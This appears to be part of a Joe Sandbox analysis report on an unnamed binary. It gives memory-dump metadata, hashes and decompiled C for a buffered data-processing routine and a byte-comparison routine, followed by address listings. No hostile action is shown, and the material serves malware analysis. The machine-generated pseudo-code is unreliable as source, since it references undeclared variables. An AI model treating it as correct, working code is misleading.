0x0008084a
0x00080853
0x00000000
0x00000000
0x00000000
0x00080853
0x000807a8
0x000807aa
0x000807c2
0x000807ca
0x000807cc
0x000807e4
0x000807ec
0x000807ee
0x00080806
0x0008080e
0x00080810
0x00080819
0x00080819
0x00000000
0x00080810
0x000807f7
0x00080800
0x00000000
0x00000000
0x00000000
0x00080800
0x000807d5
0x000807de
0x00000000
0x00000000
0x00000000
0x000807de
0x000807b3
0x000807bc
0x00000000
0x00000000
0x00000000
0x00080716
0x00080716
0x0008071d
0x0008071f
0x00080733
0x00080733
0x0008073b
0x0008073d
0x00080751
0x00080751
0x00080759
0x0008075b
0x0008076f
0x0008076f
0x00080777
0x00080779
0x00080782
0x00080782
0x00000000
0x00080779
0x00080761
0x00080764
0x0008076d
0x00000000
0x00000000
0x00000000
0x0008076d
0x00080743
0x00080746
0x0008074f
0x00000000
0x00000000
0x00000000
0x0008074f
0x00080725
0x00080728
0x00080731
0x00000000
0x00000000
0x00000000
0x00080731
0x00080706
0x00080706
0x000814f7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 81430967c375f9c30765f34ccaa33fe622cf5116776ebc2c7499c99d5b1538aa
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 53C191362095930ADFED9639853403FBAE16BA27B131A076DD4F2CB1D5FE20D568DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00076646 Relevance: .3, Instructions: 325
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00076646(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx;
				E00072E6D(__ecx, __edx);
				E000746B1(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E0007F4B0( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_t161 = E0006CA6C( *_t216,  *((intOrPtr*)(_t216 + 0x20)) + _t263, 0x00400000 - _t263 & 0xfffffff0);
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E0006A7BD(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E000737C1(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E000707F1( *((intOrPtr*)(_t216 + 0x14)), E00077090, _t232);
											} else {
												E00076A7B(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E00070A41( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E000770BF(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E0007321A(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E00081870(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E0007F4B0(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E00081870( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E00074BB3(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E0007F4B0(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}

0x00076650
0x00076652
0x00076660
0x00076668
0x0007666c
0x0007666e
0x00076670
0x00076670
0x00076673
0x00076679
0x0007667a
0x0007667f
0x00076689
0x00076670
0x00076698
0x000766a8
0x000766b1
0x000766b8
0x000766bb
0x000766bd
0x000766c1
0x000766c3
0x000766c7
0x000766cb
0x000766cf
0x000766cf
0x000766e2
0x000766e7
0x000766ed
0x00000000
0x00000000
0x000766f3
0x000766f5
0x000766f9
0x00076701
0x00000000
0x00076707
0x0007670d
0x00000000
0x00076963
0x00076717
0x00076719
0x0007671d
0x00076721
0x00076721
0x00076723
0x00076729
0x0007672d
0x0007672d
0x0007672f
0x00076732
0x00076734
0x00076738
0x0007673f
0x00076741
0x00076754
0x00076759
0x00076761
0x00076764
0x00076764
0x00076768
0x0007676b
0x00076771
0x00076777
0x0007677d
0x00076780
0x00076783
0x00000000
0x00076783
0x00076743
0x00076743
0x00076787
0x00076787
0x0007678c
0x00076796
0x0007679c
0x000767a0
0x000767a6
0x000767d9
0x000767d9
0x000767de
0x000767ef
0x000767ef
0x000767f6
0x000767e0
0x000767e0
0x000767e7
0x00000000
0x000767e9
0x000767e9
0x000767e9
0x000767e7
0x000767fe
0x0007680b
0x0007680d
0x00076810
0x00076814
0x00076814
0x00076816
0x0007681a
0x00076822
0x00076822
0x00076827
0x00000000
0x00000000
0x0007681c
0x0007681c
0x00076820
0x00000000
0x00000000
0x00076820
0x000767a8
0x000767ab
0x000767af
0x000767b5
0x000767b6
0x000767bb
0x000767bd
0x00076838
0x00076838
0x000767bf
0x000767bf
0x000767c3
0x000767ce
0x000767ce
0x000767d2
0x00000000
0x000767c5
0x000767c5
0x000767cc
0x00000000
0x00000000
0x00000000
0x00000000
0x000767cc
0x000767c3
0x000767bd
0x000767a6
0x00000000
0x00076829
0x0007682c
0x0007682e
0x0007682e
0x00076836
0x0007683d
0x0007683d
0x00076843
0x00076848
0x0007684a
0x0007684c
0x0007684e
0x0007684e
0x0007684e
0x0007684f
0x00076851
0x00076853
0x00076855
0x00076857
0x0007685b
0x0007685b
0x00076861
0x00076865
0x00076869
0x0007686d
0x0007686f
0x00076872
0x00076874
0x00076877
0x00076879
0x0007687b
0x0007687d
0x0007687d
0x0007687f
0x00076884
0x00076887
0x0007689c
0x00076889
0x0007688c
0x0007688c
0x000768a5
0x000768a7
0x000768ab
0x000768af
0x000768af
0x000768b5
0x000768b5
0x000768b9
0x000768bd
0x000768bf
0x00076a1a
0x00000000
0x000768c5
0x000768c8
0x000768cf
0x000768d3
0x000768d5
0x00076941
0x00076941
0x00000000
0x000768d7
0x000768d7
0x000768d7
0x000768d9
0x000768dc
0x000768de
0x000768e5
0x00076900
0x00076903
0x00076908
0x0007690a
0x00000000
0x00000000
0x000768e7
0x000768ea
0x000768ef
0x000768f1
0x000768f7
0x000768fe
0x00076910
0x00076910
0x00076917
0x0007691d
0x00076924
0x0007697b
0x00076980
0x00076983
0x00076985
0x0007698b
0x00076992
0x00076996
0x0007699e
0x000769a4
0x000769a7
0x000769ab
0x000769b2
0x000769b6
0x000769bd
0x000769bf
0x000769c1
0x000769d7
0x000769df
0x000769e8
0x000769ec
0x000769f2
0x00000000
0x000769f2
0x00000000
0x000769bf
0x00076926
0x00076926
0x0007692a
0x00076970
0x00076972
0x00076945
0x00076945
0x00076947
0x0007694d
0x00076951
0x00076953
0x00076959
0x00076a04
0x00076a06
0x00076a08
0x000769fc
0x000769fc
0x000769fe
0x00076a1e
0x00076a1e
0x00076a23
0x00000000
0x00000000
0x00076a0a
0x00076a13
0x000769f9
0x000769f9
0x00000000
0x000769f9
0x00076a08
0x0007695f
0x0007695f
0x00000000
0x0007695f
0x00076959
0x00000000
0x00000000
0x00000000
0x0007692a
0x00076924
0x00000000
0x00000000
0x00000000
0x000768fe
0x000768f1
0x00000000
0x0007692c
0x00076930
0x00076936
0x00076937
0x0007693b
0x0007693b
0x00000000
0x000768d9
0x000768d5
0x00000000
0x000768bf
0x0007696b
0x00000000
0x0007670d
0x00076701
0x00000000
0x000766f9
0x00076a29
0x00076a31
0x00076a34
0x00076a39
0x00076a47
0x00076a4c
0x00076a5a
0x00076a78

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d5747d81a21abef5dc56ff8346a1c6e8baf898b8b53874b1170ca37d927ecc5a
Instruction ID: 13e7bf36b0a44995e3c5358c539623ec3340897b9bd70801850b09239e0ee87a
Opcode Fuzzy Hash: d5747d81a21abef5dc56ff8346a1c6e8baf898b8b53874b1170ca37d927ecc5a
Instruction Fuzzy Hash: 0ED129B1E047419FCB14CF28C88079BBBE0BF45308F04856DE84A9B242D739E955CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 000802F6 Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000802F6(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x000802f6
0x000802f6
0x000802f6
0x000802fc
0x00080383
0x00080385
0x00080387
0x00080706
0x00080706
0x000814f7
0x000814f7
0x0008038d
0x00080393
0x0008041a
0x0008041c
0x0008041e
0x00000000
0x00000000
0x00080424
0x0008042a
0x000804b1
0x000804b3
0x000804b5
0x00000000
0x00000000
0x000804bb
0x000804c1
0x00080548
0x0008054a
0x0008054c
0x00000000
0x00000000
0x00080558
0x000805e0
0x000805e2
0x000805e4
0x00000000
0x00000000
0x000805ea
0x000805f0
0x00080677
0x00080679
0x0008067b
0x00000000
0x00000000
0x00080681
0x00080687
0x000806fe
0x00080700
0x00080702
0x00080704
0x00080704
0x00000000
0x00080702
0x00080690
0x00080692
0x000806a6
0x000806ae
0x000806b0
0x000806c4
0x000806cc
0x000806ce
0x000806e2
